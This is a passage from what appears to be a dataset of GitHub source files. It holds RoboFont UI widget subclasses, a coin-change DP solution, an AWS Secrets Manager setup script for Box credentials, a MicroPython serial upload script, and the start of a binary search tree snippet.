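    value = minimum + (pos / extent) * (maximum - minimum)
    return round(value) if round_values else value

print(pointer_to_axis_value(150, 300, 0, 1000))  # 500
```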
toolbaritem.getNSButton().setToolTip_(toolTip)\n toolbaritem.status = False\n if callback is not None:\n toolbaritem.callback = callback\n return toolbaritem\n\n def toolbarItemStatusUpdateCB(self, sender):\n # creating checkbox functionality of btns in Tools Group\n buttonObject = sender.getNSButton()\n if sender.status:\n sender.status = False\n buttonObject.setBordered_(False)\n else:\n sender.status = True\n buttonObject.setBordered_(True)\n\n sender.callback(sender) # calling custom toggle callback\n\nclass MTSheet(Sheet):\n pass\n # def __init__(self, posSize, parentWindow, title=\"\", minSize=None, maxSize=None, textured=False,\n # autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n # fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None):\n # if isinstance(parentWindow, Window):\n # parentWindow = parentWindow._window\n # self.parentWindow = parentWindow\n # textured = bool(parentWindow.styleMask() & AppKit.NSTexturedBackgroundWindowMask)\n #\n # mask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSBorderlessWindowMask\n # if closable:\n # mask = mask | AppKit.NSClosableWindowMask\n # if miniaturizable:\n # mask = mask | AppKit.NSMiniaturizableWindowMask\n # if minSize or maxSize:\n # mask = mask | AppKit.NSResizableWindowMask\n # if textured:\n # mask = mask | AppKit.NSTexturedBackgroundWindowMask\n # if fullSizeContentView and osVersionCurrent >= osVersion10_10:\n # mask = mask | AppKit.NSFullSizeContentViewWindowMask\n # # start the window\n # ## too magical?\n # if len(posSize) == 2:\n # l = t = 100\n # w, h = posSize\n # cascade = True\n # else:\n # l, t, w, h = posSize\n # cascade = False\n # if screen is None:\n # screen = AppKit.NSScreen.mainScreen()\n # frame = _calcFrame(screen.visibleFrame(), ((l, t), (w, h)))\n # self._window = self.nsWindowClass.alloc().initWithContentRect_styleMask_backing_defer_screen_(\n # frame, mask, AppKit.NSBackingStoreBuffered, False, screen)\n # if autosaveName is not None:\n # # This also sets the window frame if it was previously stored.\n # # Make sure we do this before cascading.\n # self._window.setFrameAutosaveName_(autosaveName)\n # if cascade:\n # self._cascade()\n # if minSize is not None:\n # self._window.setMinSize_(minSize)\n # if maxSize is not None:\n # self._window.setMaxSize_(maxSize)\n # self._window.setTitle_(title)\n # self._window.setLevel_(self.nsWindowLevel)\n # self._window.setReleasedWhenClosed_(False)\n # self._window.setDelegate_(self)\n # self._bindings = {}\n # self._initiallyVisible = initiallyVisible\n # # full screen mode\n # if osVersionCurrent >= osVersion10_7:\n # if fullScreenMode is None:\n # pass\n # elif fullScreenMode == \"primary\":\n # self._window.setCollectionBehavior_(AppKit.NSWindowCollectionBehaviorFullScreenPrimary)\n # elif fullScreenMode == \"auxiliary\":\n # self._window.setCollectionBehavior_(AppKit.NSWindowCollectionBehaviorFullScreenAuxiliary)\n # # titlebar visibility\n # if osVersionCurrent >= osVersion10_10:\n # if not titleVisible:\n # self._window.setTitleVisibility_(AppKit.NSWindowTitleHidden)\n # else:\n # self._window.setTitleVisibility_(AppKit.NSWindowTitleVisible)\n # # full size content view\n # self._window.setTitleVisibility_(False)\n # self._window.setTitlebarAppearsTransparent_(True)\n #\n # self.title = TextBox((0,2,-0,17),title,alignment=\"center\",sizeStyle=\"small\")\n\n\n\nclass MTWindowWrapper(Window):\n #appearance = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n nsWindowClass = 
MTWindow\n\n nsWindowStyleMask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSTitledWindowMask | AppKit.NSBorderlessWindowMask\n if osVersionCurrent >= osVersion10_14:\n appearanceDark = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameDarkAqua)\n appearanceLight = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n\n\n def __init__(self, posSize, title=\"\", minSize=None, maxSize=None, textured=False,\n autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None, darkMode=False):\n super().__init__(posSize, title=title, minSize=minSize, maxSize=maxSize, textured=textured,\n autosaveName=autosaveName, closable=closable, miniaturizable=miniaturizable, initiallyVisible=initiallyVisible,\n fullScreenMode=fullScreenMode, titleVisible=titleVisible, fullSizeContentView=fullSizeContentView, screen=screen)\n if osVersionCurrent >= osVersion10_14:\n if darkMode:\n self._window.setAppearance_(self.appearanceDark)\n else:\n self._window.setAppearance_(self.appearanceLight)\n\nclass MTFloatingWindowWrapper(Window):\n #appearance = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n # nsWindowClass = MTWindowWrapper\n nsWindowClass = AppKit.NSPanel\n nsWindowLevel = AppKit.NSFloatingWindowLevel\n\n # nsWindowStyleMask = AppKit.NSHUDWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSTitledWindowMask | AppKit.NSBorderlessWindowMask\n nsWindowStyleMask = AppKit.NSTitledWindowMask | AppKit.NSUtilityWindowMask | AppKit.NSBorderlessWindowMask | AppKit.NSClosableWindowMask\n if osVersionCurrent >= osVersion10_14:\n appearanceDark = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameDarkAqua)\n appearanceLight = AppKit.NSAppearance.appearanceNamed_(AppKit.NSAppearanceNameAqua)\n\n\n def __init__(self, posSize, title=\"\", minSize=None, maxSize=None, textured=False,\n autosaveName=None, closable=True, miniaturizable=True, initiallyVisible=True,\n fullScreenMode=None, titleVisible=True, fullSizeContentView=False, screen=None, darkMode=False, noTitleBar=False):\n super().__init__(posSize, title=title, minSize=minSize, maxSize=maxSize, textured=textured,\n autosaveName=autosaveName, closable=closable, miniaturizable=miniaturizable, initiallyVisible=initiallyVisible,\n fullScreenMode=fullScreenMode, titleVisible=titleVisible, fullSizeContentView=fullSizeContentView, screen=screen)\n self._window.setBecomesKeyOnlyIfNeeded_(True)\n self._window.standardWindowButton_(AppKit.NSWindowMiniaturizeButton).setHidden_(True)\n self._window.standardWindowButton_(AppKit.NSWindowZoomButton).setHidden_(True)\n if noTitleBar:\n self._window.setTitlebarAppearsTransparent_(True)\n self._window.setTitleVisibility_(0)\n if osVersionCurrent >= osVersion10_14:\n if darkMode:\n self._window.setAppearance_(self.appearanceDark)\n else:\n self._window.setAppearance_(self.appearanceLight)\n def show(self):\n \"\"\"\n Show the window if it is hidden.\n \"\"\"\n # don't make key!\n self._window.orderFront_(None)\n\n\nclass MTDialog(object):\n \"\"\"\n in subclass you have to describe self.w as instance of MTWindowWrapper (you can use class attr window for it)\n \"\"\"\n txtH = 17\n btnH = 24\n padding = (10,10,10)\n window = MTWindowWrapper\n settingsSheet = MTSheet\n toolbar = MTToolbar\n def __init__(self):\n self.w = None\n addObserver(self, 'closeDialogWithDesignSpaceWindow', 'MT.designspacewindow.windowClosed') # description\n\n def closeDialogWithDesignSpaceWindow(self, 
sender):\n self.w.close()\n\n\nclass MTFloatingDialog(object):\n \"\"\"\n in subclass you have to describe self.w as instance of MTWindowWrapper (you can use class attr window for it)\n \"\"\"\n txtH = 17\n btnH = 24\n padding = (10,10,10)\n window = MTFloatingWindowWrapper\n settingsSheet = MTSheet\n toolbar = MTToolbar\n def __init__(self):\n self.w = None\n addObserver(self, 'closeDialogWithDesignSpaceWindow', 'MT.designspacewindow.windowClosed') # description\n\n def closeDialogWithDesignSpaceWindow(self, sender):\n self.w.close()\n\n\nclass MTList(List):\n \"\"\"\n sepcialCellDescription = {column index:AppKit.NSTableCell subclass}\n \"\"\"\n nsTableViewClass = MTTableViewSubclass\n delegateClass = MTTableDelegate\n\n def __init__(self, posSize, items, dataSource=None, columnDescriptions=None, showColumnTitles=True,\n selectionCallback=None, doubleClickCallback=None, editCallback=None, menuCallback=None,\n enableDelete=False, enableTypingSensitivity=False,\n allowsMultipleSelection=True, allowsEmptySelection=True,\n allowsSorting=True,\n drawVerticalLines=False, drawHorizontalLines=False,\n autohidesScrollers=True, drawFocusRing=False, rowHeight=17,\n drawBorders=False,\n allowSelection=True,\n transparentBackground=False,\n selfDropSettings=None,\n selfWindowDropSettings=None,\n selfDocumentDropSettings=None,\n selfApplicationDropSettings=None,\n otherApplicationDropSettings=None,\n widthIsHeader=False,\n dragSettings=None,\n mainWindow=None,\n font=None,\n headerHeight=None,\n highlightDescriptions={},\n ):\n if items is not None and dataSource is not None:\n raise VanillaError(\"can't pass both items and dataSource arguments\")\n self._highlightDescriptions = highlightDescriptions\n self._rowNum = len(items)\n self._posSize = posSize\n self._enableDelete = enableDelete\n self._nsObject = getNSSubclass(self.nsScrollViewClass)(self)\n self._nsObject.setAutohidesScrollers_(autohidesScrollers)\n self._nsObject.setHasHorizontalScroller_(True)\n self._nsObject.setHasVerticalScroller_(True)\n self._nsObject.setBorderType_(NSBezelBorder)\n self._nsObject.setDrawsBackground_(False)\n\n self._setAutosizingFromPosSize(posSize)\n self._allowsSorting = allowsSorting\n # add a table view to the scroll view\n self._tableView = getNSSubclass(self.nsTableViewClass)(self)\n self._nsObject.setDocumentView_(self._tableView)\n # set up an observer that will be called by the bindings when a cell is edited\n self._editCallback = editCallback\n self._editObserver = self.nsArrayControllerObserverClass.alloc().init()\n\n if editCallback is not None:\n self._editObserver._targetMethod = self._edit # circular reference to be killed in _breakCycles\n if items is not None:\n # wrap all the items\n items = [self._wrapItem(item) for item in items]\n items =AppKit.NSMutableArray.arrayWithArray_(items)\n # set up an array controller\n self._arrayController = self.nsArrayControllerClass.alloc().initWithContent_(items)\n self._arrayController.setSelectsInsertedObjects_(False)\n self._arrayController.setAvoidsEmptySelection_(not allowsEmptySelection)\n else:\n self._arrayController = dataSource\n self._tableView.setDataSource_(self._arrayController)\n # hide the header\n if not showColumnTitles or not columnDescriptions:\n self._tableView.setHeaderView_(None)\n self._tableView.setCornerView_(None)\n if headerHeight is not None:\n header = AppKit.NSTableHeaderView.alloc().initWithFrame_(AppKit.NSMakeRect(0,0,0, headerHeight))\n self._tableView.setHeaderView_(header)\n # set the table attributes\n 
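# Hypothetical examples of the structures consumed here: a columnDescriptions\n        # entry such as {\"title\": \"name\", \"width\": 120, \"editable\": False}, and a\n        # highlightDescriptions mapping such as {(0, 1): (1, 0, 0, 1)}, i.e. (row, col) -> rgba.\n        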
self._tableView.setUsesAlternatingRowBackgroundColors_(False)\n #if not drawFocusRing:\n self._tableView.setFocusRingType_(NSFocusRingTypeNone)\n self._tableView.setRowHeight_(rowHeight+2)\n self._tableView.setAllowsEmptySelection_(allowsEmptySelection)\n self._tableView.setAllowsMultipleSelection_(allowsMultipleSelection)\n if drawVerticalLines or drawHorizontalLines:\n if drawVerticalLines and drawHorizontalLines:\n lineType =AppKit.NSTableViewSolidVerticalGridLineMask |AppKit.NSTableViewSolidHorizontalGridLineMask\n elif drawVerticalLines:\n lineType =AppKit.NSTableViewSolidVerticalGridLineMask\n else:\n lineType =AppKit.NSTableViewSolidHorizontalGridLineMask\n self._tableView.setGridStyleMask_(lineType)\n # set up the columns. also make a flag that will be used\n # when unwrapping items.\n self._orderedColumnIdentifiers = []\n self._typingSensitiveColumn = 0\n if not columnDescriptions:\n self._makeColumnWithoutColumnDescriptions()\n self._itemsWereDict = False\n else:\n self._makeColumnsWithColumnDescriptions(columnDescriptions, mainWindow, drawBorders, transparentBackground, font, widthIsHeader, headerHeight)\n self._itemsWereDict = True\n #### TEST\n self.columnDescriptions_DELETE = columnDescriptions\n # set some typing sensitivity data\n self._typingSensitive = enableTypingSensitivity\n if enableTypingSensitivity:\n self._lastInputTime = None\n self._typingInput = []\n # set up an observer that will be called by the bindings when the selection changes.\n # this needs to be done ater the items have been added to the table. otherwise,\n # the selection method will be called when the items are added to the table view.\n if selectionCallback is not None:\n self._selectionCallback = selectionCallback\n self._selectionObserver = self.nsArrayControllerObserverClass.alloc().init()\n self._arrayController.addObserver_forKeyPath_options_context_(self._selectionObserver, \"selectionIndexes\",AppKit.NSKeyValueObservingOptionNew, 0)\n self._selectionObserver._targetMethod = self._selection # circular reference to be killed in _breakCycles\n # set the double click callback the standard way\n if doubleClickCallback is not None:\n self._doubleClickTarget = VanillaCallbackWrapper(doubleClickCallback)\n self._tableView.setTarget_(self._doubleClickTarget)\n self._tableView.setDoubleAction_(\"action:\")\n # store the contextual menu callback\n self._menuCallback = menuCallback\n # set the drop data\n self._selfDropSettings = selfDropSettings\n self._selfWindowDropSettings = selfWindowDropSettings\n self._selfDocumentDropSettings = selfDocumentDropSettings\n self._selfApplicationDropSettings = selfApplicationDropSettings\n self._otherApplicationDropSettings = otherApplicationDropSettings\n allDropTypes = []\n for settings in (selfDropSettings, selfWindowDropSettings, selfDocumentDropSettings, selfApplicationDropSettings, otherApplicationDropSettings):\n if settings is None:\n continue\n dropType = settings[\"type\"]\n allDropTypes.append(dropType)\n self._tableView.registerForDraggedTypes_(allDropTypes)\n # set the default drop operation masks\n notLocal =AppKit.NSDragOperationNone\n if otherApplicationDropSettings is not None:\n notLocal = otherApplicationDropSettings.get(\"operation\",AppKit.NSDragOperationCopy)\n self._tableView.setDraggingSourceOperationMask_forLocal_(notLocal, False)\n local =AppKit.NSDragOperationNone\n for settings in (selfDropSettings, selfDocumentDropSettings, selfApplicationDropSettings):\n if settings is None:\n continue\n local = 
settings.get(\"operation\",AppKit.NSDragOperationCopy)\n self._tableView.setDraggingSourceOperationMask_forLocal_(local, True)\n\n if transparentBackground:\n self._tableView.setBackgroundColor_(NSColor.clearColor())\n #self._tableView.headerView().setBackgroundColor_(NSColor.clearColor())\n # deletingBorders\n if drawBorders is False:\n self._tableView.enclosingScrollView().setBorderType_(0)\n # set the drag data\n self._dragSettings = dragSettings\n\n # set up a delegate class\n\n self._delegate = self.delegateClass.alloc().initWithSelectionPremission_(allowSelection)\n self._tableView.setDelegate_(self._delegate)\n self._tableView.setIntercellSpacing_( AppKit.NSSize(0,0) )\n if not allowSelection:\n self.setSelection([])\n self.setCellHighlighting(self._highlightDescriptions)\n\n def getHighlightDescriptions(self):\n return self._highlightDescriptions\n \n def setCellHighlighting(self, highlightDescriptions):\n \"\"\"\n :param info: {(rowId,columnId)=(rgb||rgba)}\n :return: None\n \"\"\"\n self._highlightDescriptions = highlightDescriptions\n self._tableView.setTableCellHighlight_(highlightDescriptions)\n\n def _handleColumnWidths(self, columnDescriptions):\n # we also use this opportunity to determine if\n # autoresizing should be set for the table.\n autoResize = True\n for column in columnDescriptions:\n if column.get(\"width\") is not None:\n autoResize = False\n break\n if autoResize:\n self._setColumnAutoresizing()\n\n def _setColumnAutoresizing(self):\n # self._tableView.setColumnAutoresizingStyle_(AppKit.NSTableViewLastColumnOnlyAutoresizingStyle)\n self._tableView.setColumnAutoresizingStyle_(AppKit.NSTableViewUniformColumnAutoresizingStyle)\n\n def _makeColumnsWithColumnDescriptions(self, columnDescriptions, mainWindow, drawBorders, transparentBackground, font, widthIsHeader, headerHeight):\n # make sure that the column widths are in the correct format.\n self._handleColumnWidths(columnDescriptions)\n # create each column.\n tableAllowsSorting = self._allowsSorting\n tableWidth = 0\n for columnIndex, data in enumerate(columnDescriptions):\n\n title = data[\"title\"]\n image = data.get(\"image\")\n headerToolTip = data.get(\"headerToolTip\")\n key = data.get(\"key\", title)\n width = data.get(\"width\")\n minWidth = data.get(\"minWidth\", width)\n maxWidth = data.get(\"maxWidth\", width)\n formatter = data.get(\"formatter\")\n cell = data.get(\"cell\")\n editable = data.get(\"editable\")\n allowsSorting = data.get(\"allowsSorting\", True)\n binding = data.get(\"binding\", \"value\")\n font = data.get(\"font\")\n textColor = data.get(\"textColor\")\n alignment = data.get(\"alignment\")\n truncateFromStart = data.get(\"truncateFromStart\")\n keyPath = \"arrangedObjects.%s\" % key\n if font is not None:\n if isinstance(font, tuple):\n font =AppKit.NSFont.fontWithName_size_(*font)\n # check for typing sensitivity.\n if data.get(\"typingSensitive\"):\n self._typingSensitiveColumn = columnIndex\n # instantiate the column.\n column =AppKit.NSTableColumn.alloc().initWithIdentifier_(key)\n # # #####TEST\n if transparentBackground:\n myHeaderCell = TransparentNSTableHeaderCell.alloc().init()\n column.setHeaderCell_(myHeaderCell)\n if headerHeight is not None and transparentBackground is False:\n # print('ResizedNSTableHeaderCell 1')\n myHeaderCell = ResizedNSTableHeaderCell.alloc().init()\n # print('ResizedNSTableHeaderCell 2')\n column.setHeaderCell_(myHeaderCell)\n # print('ResizedNSTableHeaderCell 3')\n # # #####TEST\n self._orderedColumnIdentifiers.append(key)\n # set the width 
resizing mask\n if width is not None:\n if width == minWidth and width == maxWidth:\n mask =AppKit.NSTableColumnNoResizing\n else:\n mask =AppKit.NSTableColumnUserResizingMask |AppKit.NSTableColumnAutoresizingMask\n else:\n mask =AppKit.NSTableColumnUserResizingMask |AppKit.NSTableColumnAutoresizingMask\n column.setResizingMask_(mask)\n # set the header cell\n\n column.headerCell().setTitle_(title)\n # setting custom font\n \n\n if font is not None and self._tableView.headerView() is not None:\n column.headerCell().setFont_(font)\n if truncateFromStart is not None and self._tableView.headerView() is not None:\n if truncateFromStart:\n if isinstance(column.headerCell(), AppKit.NSTextFieldCell):\n column.headerCell().setLineBreakMode_(3)\n\n if transparentBackground:\n column.headerCell().setDrawsBackground_(False)\n column.headerCell().setBackgroundColor_(NSColor.clearColor())\n # set the data cell\n if cell is None:\n cell = column.dataCell()\n cell.setDrawsBackground_(False)\n cell.setStringValue_(\"\") # cells have weird default values\n if truncateFromStart is not None:\n if truncateFromStart:\n if isinstance(cell, AppKit.NSTextFieldCell):\n cell.setLineBreakMode_(3)\n else:\n column.setDataCell_(cell)\n # setting custom font\n if font is not None:\n cell.setFont_(font)\n\n if alignment is not None:\n cell.setAlignment_(_textAlignmentMap[alignment])\n\n # assign the formatter\n if formatter is not None:\n cell.setFormatter_(formatter)\n if self._arrayController is not None:\n bindingOptions = None\n if not tableAllowsSorting or not allowsSorting:\n bindingOptions = {NSCreatesSortDescriptorBindingOption : False}\n # assign the key to the binding\n column.bind_toObject_withKeyPath_options_(binding, self._arrayController, keyPath, bindingOptions)\n\n # set the editability of the column.\n # if no value was defined in the column data,\n # base the editability on the presence of\n # an edit callback.\n if editable is None and self._editCallback is None:\n editable = False\n elif editable is None and self._editCallback is not None:\n editable = True\n if editable:\n if self._arrayController is not None:\n self._arrayController.addObserver_forKeyPath_options_context_(self._editObserver, keyPath,AppKit.NSKeyValueObservingOptionNew, 0)\n else:\n column.setEditable_(False)\n # finally, add the column to the table view\n self._tableView.addTableColumn_(column)\n\n # applying textColor\n if textColor is not None:\n if isinstance(textColor,tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*textColor)\n else:\n color = textColor\n cell.setTextColor_(color)\n\n if transparentBackground:\n column.headerCell().setBackgroundColor_(NSColor.clearColor())\n if widthIsHeader:\n width = column.headerCell().attributedStringValue().size().width\n column.setWidth_(width+10)\n column.setMinWidth_(width+10)\n column.setMaxWidth_(width+10)\n tableWidth += width+14\n else:\n if width is not None:\n # do this *after* adding the column to the table, or the first column\n # will have the wrong width (at least on 10.3)\n column.setWidth_(width)\n column.setMinWidth_(minWidth)\n column.setMaxWidth_(maxWidth)\n # print(f'column {columnIndex}', data)\n if image is not None:\n # print(image)\n column.headerCell().setImage_(image)\n if headerToolTip is None:\n column.setHeaderToolTip_(title)\n if headerToolTip is not None:\n column.setHeaderToolTip_(headerToolTip)\n\n # force the columns to adjust their widths if possible. 
(needed in 10.10)\n if mainWindow is not None:\n x,y,w,h = mainWindow.window().getPosSize()\n\n if tableWidth+210+18 < w-25:\n x,y,w,h = self.getPosSize()\n self.setPosSize((x,y,tableWidth,h))\n self._tableView.sizeToFit()\n self.tableWidth = tableWidth\n\ndef MTTextBox(posSize, text=\"\", alignment=\"natural\", selectable=False, sizeStyle=\"regular\", fontAttr=None, color=None):\n txtBox = TextBox(posSize, text, alignment, selectable, sizeStyle)\n if fontAttr is not None:\n if isinstance(fontAttr, tuple):\n fontAttr =AppKit.NSFont.fontWithName_size_(*fontAttr)\n txtBox.getNSTextField().setFont_(fontAttr)\n if color is not None:\n if isinstance(color, tuple):\n color =AppKit.NSColor.colorWithCalibratedRed_green_blue_alpha_(*color)\n txtBox.getNSTextField().setTextColor_(color)\n\n return txtBox\n\ndef MTButton(posSize, title, callback=None, sizeStyle=\"mini\"):\n button = Button(posSize, title, callback=callback, sizeStyle=sizeStyle)\n nsObj = button.getNSButton()\n nsObj.setBezelStyle_(AppKit.NSRoundRectBezelStyle)\n return button\n\nclass MTDesignSpaceLoadingProblem:\n def __init__(self, path, parentController, foundDSEditor, DSProblemChecker):\n self.parentController = parentController\n txtH = 17\n x,y,p = (10,10,10)\n loadingissue = MTFloatingWindowWrapper((550, 300),minSize=(440, 300))\n loadingissue.title = TextBox((x,y,-p,txtH*6),'Error loading design space file.\\n\\n\\nMaster-tool faced following design space problems,\\nwhile loading the design space file (some of them are critical):')\n y += txtH*6 + p\n _categories = DesignSpaceProblem._categories\n _problems = DesignSpaceProblem._problems\n # problems = [dict(category=_categories[problem.category],problem=_problems[(problem.category,problem.problem)],data=problem.data) for problem in DSProblemChecker.problems]\n problems = []\n for problem in DSProblemChecker.problems:\n _category = _categories[problem.category]\n _problem = _problems[(problem.category,problem.problem)]\n if problem.data is not None:\n _data = [ f'{key}: {problem.data[key]}' for key in problem.data ]\n else: _data = ''\n problems += [\n dict(\n category=_category,\n problem=_problem,\n data='; '.join(_data),\n )\n ]\n\n columnDescriptions=[{\"title\": \"category\",\"font\":AppKit.NSFont.systemFontOfSize_(10),'minWidth':70,\"width\":70,\"textColor\":((1,0,0,1)), 'cell':MTVerticallyCenteredTextFieldCell.alloc().init()}, \n {\"title\": \"problem\",\"font\":(\"Monaco\",10),\"alignment\":\"left\",'truncateFromStart':True, 'cell':MTVerticallyCenteredTextFieldCell.alloc().init(),'maxWidth':215,'minWidth':215,'width':215},\n {\"title\": \"data\",\"font\":(\"Monaco\",10),\"alignment\":\"left\",'truncateFromStart':True, 'cell':MTVerticallyCenteredTextFieldCell.alloc().init(),'minWidth':45},\n ]\n\n\n\n loadingissue.list = MTList(\n (p,y,-p,-txtH-2*p),\n problems, rowHeight=30,\n transparentBackground=True,\n allowsMultipleSelection=False,\n columnDescriptions=columnDescriptions)\n # loadingissue.list.getNSTableView().setSelectionHighlightStyle_(4)\n lineType =AppKit.NSTableViewSolidHorizontalGridLineMask\n loadingissue.list.getNSTableView().setGridStyleMask_(lineType)\n\n loadingissue.cancelBtn = MTButton((x, -txtH-p,200,txtH), 'cancel', callback=self._closeIssueWarning)\n loadingissue.cancelBtn.parent = loadingissue\n if foundDSEditor:\n loadingissue.openDesignSpaceEditorBtn = MTButton((x+200+p, -txtH-p,200,txtH), 'open in design space editor', callback=self._openDSEditor)\n loadingissue.openDesignSpaceEditorBtn.parent = loadingissue\n 
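# keep the designspace path on the button so _openDSEditor can reach it from the callback\n            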
loadingissue.openDesignSpaceEditorBtn.path = path\n            loadingissue.openDesignSpaceEditorBtn.enable(foundDSEditor)\n        loadingissue.open()\n\n    def _closeIssueWarning(self, btn):\n        btn.parent.close()\n\n    def _openDSEditor(self, btn):\n        self.parentController.openDesignSpaceEditorCallback(btn)\n        btn.parent.close()\n\nif __name__ == '__main__':\n    print('main')","repo_name":"RafalBuchner/masterTools","sub_path":"master-tools.roboFontExt/lib/masterTools/UI/vanillaSubClasses.py","file_name":"vanillaSubClasses.py","file_ext":"py","file_size_in_byte":44318,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"28241472287","text":"from leetcode_alg import *\n\n\nclass Solution:\n    \"\"\"Unbounded-knapsack style DP: dp[x] counts the coin combinations summing to x;\n    iterating coins in the outer loop counts combinations rather than permutations.\"\"\"\n    def change(self, amount: int, coins: List[int]) -> int:\n        dp = [0] * (amount + 1)\n        dp[0] = 1\n        for c in coins:\n            for capa in range(c, amount+1):\n                dp[capa] += dp[capa-c]\n        return dp[amount]\n\n\nif __name__ == \"__main__\":\n    amount = 5\n    coins = [1, 2, 5]\n    assert Solution().change(amount, coins) == 4\n","repo_name":"Jintao-Huang/LeetCode-Py","sub_path":"answer/0518.py","file_name":"0518.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"16288454760","text":"#!/usr/bin/env python3\nimport boto3\nimport argparse\nimport json\nfrom pathlib import Path\nfrom boxsdk import JWTAuth\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser(\n        \"create_secret.py\", description=\"create a Secrets Manager secret for use with notebook-data-redirector\"\n    )\n    parser.add_argument(\"--secret-name\", help=\"the name of the Secrets Manager secret to create\", required=True)\n    parser.add_argument(\"--box-client-id\", help=\"your Box client ID\", required=True)\n    parser.add_argument(\"--box-client-secret\", help=\"your Box client secret\", required=True)\n    parser.add_argument(\"--box-enterprise-id\", help=\"your Box enterprise ID\", required=True)\n    parser.add_argument(\"--box-jwt-key-id\", help=\"your Box JWT key ID\", required=True)\n    parser.add_argument(\n        \"--box-rsa-private-key-path\", help=\"path to a file containing your Box RSA private key\", required=True\n    )\n    parser.add_argument(\"--box-rsa-private-key-passphrase\", help=\"your Box RSA private key passphrase\", required=True)\n    parser.add_argument(\"--box-webhook-signature-key\", help=\"your Box webhook signature key\", required=True)\n    parser.add_argument(\n        \"--tags\", nargs=\"+\", type=str, default=[], help=\"space separated list of key value tag pairs\", required=False\n    )\n    parser.add_argument(\"--force\", help=\"overwrite an existing Secrets Manager secret\", action=\"store_true\")\n    return parser.parse_args()\n\n\ndef check_box_auth(secret):\n    try:\n        JWTAuth(\n            client_id=secret[\"box_client_id\"],\n            client_secret=secret[\"box_client_secret\"],\n            enterprise_id=secret[\"box_enterprise_id\"],\n            jwt_key_id=secret[\"box_jwt_key_id\"],\n            rsa_private_key_data=secret[\"box_rsa_private_key_data\"],\n            rsa_private_key_passphrase=secret[\"box_rsa_private_key_passphrase\"],\n        ).authenticate_instance()\n    except Exception as e:\n        raise RuntimeError(\"Box failed to authenticate, check credentials and try again\") from e\n\n\ndef create_secret(secret_name, secret, tags=[], force=False):\n    serialized_secret = json.dumps(secret)\n\n    client = boto3.client(\"secretsmanager\")\n\n    try:\n        arn = client.describe_secret(SecretId=secret_name)[\"ARN\"]\n        # on the STSci control tower account, a generic ClientError is raised if the 
resource doesn't exist.\n # this is likely due to describe secret only being allowed on your own tagged secrets\n except (client.exceptions.ResourceNotFoundException, client.exceptions.ClientError):\n arn = client.create_secret(\n Name=secret_name,\n Description=\"Credentials for notebook-data-redirector\",\n SecretString=serialized_secret,\n Tags=tags,\n )[\"ARN\"]\n else:\n if force:\n client.put_secret_value(SecretId=arn, SecretString=serialized_secret)\n client.tag_resource(SecretId=arn, Tags=tags)\n else:\n raise RuntimeError(\"A secret already exists with the specified name, use --force to overwrite it\")\n\n return arn\n\n\nargs = parse_args()\n\nsecret = {}\nsecret[\"box_client_id\"] = args.box_client_id\nsecret[\"box_client_secret\"] = args.box_client_secret\nsecret[\"box_enterprise_id\"] = args.box_enterprise_id\nsecret[\"box_jwt_key_id\"] = args.box_jwt_key_id\nsecret[\"box_rsa_private_key_passphrase\"] = args.box_rsa_private_key_passphrase\nsecret[\"box_webhook_signature_key\"] = args.box_webhook_signature_key\nwith Path(args.box_rsa_private_key_path).open() as file:\n secret[\"box_rsa_private_key_data\"] = file.read().replace(\"\\\\n\", \"\\n\")\n\ncheck_box_auth(secret)\n\nif (len(args.tags) >= 2) and (len(args.tags) % 2 == 0):\n tags = [{\"Key\": k, \"Value\": v} for k, v in zip(args.tags[0::2], args.tags[1::2])]\nelif len(args.tags) > 0:\n raise ValueError(\n \"tags argument must be a space-separated list of key value pairs, and therefore should have an even number of entries\"\n )\nelse:\n tags = []\n\narn = create_secret(args.secret_name, secret, tags=tags, force=args.force)\n\nprint(f\"Created Secrets Manager secret with ARN: {arn}\")\n","repo_name":"spacetelescope/notebook-data-redirector","sub_path":"scripts/create_secret.py","file_name":"create_secret.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"18770030716","text":"#! 
/usr/bin/env python\n\nimport serial\nimport sys\nimport time\n\nif len(sys.argv) != 2:\n  sys.stderr.write('USAGE: %s <filename>\\n' % sys.argv[0])\n  sys.exit(1)\n\ndata = open(sys.argv[1], 'rb').read()\n\nser = serial.Serial('/dev/tty.SLAB_USBtoUART', 115200, timeout=1)\nser.write('\\x01import os;import sys;')\nser.write('data=sys.stdin.read(%d)\\n\\x04' % len(data))\nser.write(data)\nser.write('with open(\"%s\", \"wb\") as fh:\\n  fh.write(data)\\n\\x04' % sys.argv[1])\nser.write('\\x02')\nser.write('os.listdir()\\r\\n')\n","repo_name":"flagxor/wbgame","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"uk","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40674918597","text":"class NodoArvore:\n    def __init__(self, chave=None, esq=None, dir=None):\n        self.chave = chave\n        self.esq = esq\n        self.dir = dir\n\n    def __str__(self):\n        return '%s' % (self.chave)\n\ndef inserirABB(raiz, nodo):\n    if raiz is None:\n        raiz = nodo\n    # Check the base case where esq and dir are None\n    elif nodo.chave > raiz.chave:  # Value goes right because it is greater than the root\n        if raiz.dir is None:\n            raiz.dir = nodo\n            print(raiz)\n        else:\n            inserirABB(raiz.dir, nodo)\n    else:\n        if raiz.esq is None:\n            raiz.esq = nodo\n        else:\n            inserirABB(raiz.esq, nodo)\n\ndef nivel(raiz, n):\n    # Return the level (depth) of key n in the tree, 